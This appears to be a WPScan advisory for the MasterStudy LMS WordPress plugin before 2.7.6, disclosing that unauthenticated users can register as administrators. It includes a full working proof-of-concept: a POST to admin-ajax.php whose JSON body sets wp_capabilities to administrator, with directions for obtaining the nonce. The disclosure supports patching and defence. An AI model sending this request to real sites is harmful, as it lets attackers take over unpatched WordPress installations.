WordPress Plugin Vulnerabilities
MasterStudy LMS < 2.7.6 - Unauthenticated Admin Account Creation
Description
The plugin does to validate some parameters given when registering a new account, allowing unauthenticated users to register as an admin
Proof of Concept
The nonce value of the stm_lms_register request must be retrieved from the ajax page. for this you should check the home page
POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce=[NONCE] HTTP/1.1
Connection: close
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
Accept-Language: tr,en;q=0.9,tr-TR;q=0.8,en-US;q=0.7,el;q=0.6,zh-CN;q=0.5,zh;q=0.4
Content-Type: application/json
Content-Length: 339
{"user_login":"USERNAME","user_email":"EMAIL@TLD","user_password":"PASSWORD","user_password_re":"PASSWORD","become_instructor":"","privacy_policy":true,"degree":"","expertize":"","auditory":"","additional":[],"additional_instructors":[],"profile_default_fields_for_register":{"wp_capabilities":{"value":{"administrator":1}}}}
https://gist.github.com/numanturle/4762b497d3b56f1a399ea69aa02522a6
https://www.youtube.com/watch?v=SI_O6CHXMZk
Affects Plugins
Fixed in 2.7.6 References
Classification
Type
PRIVESC
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Numan Türle
Submitter
Numan Türle
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-02-01 (about 2 years ago)
Added
2022-02-01 (about 2 years ago)
Last Updated
2022-04-13 (about 2 years ago)
WPScan 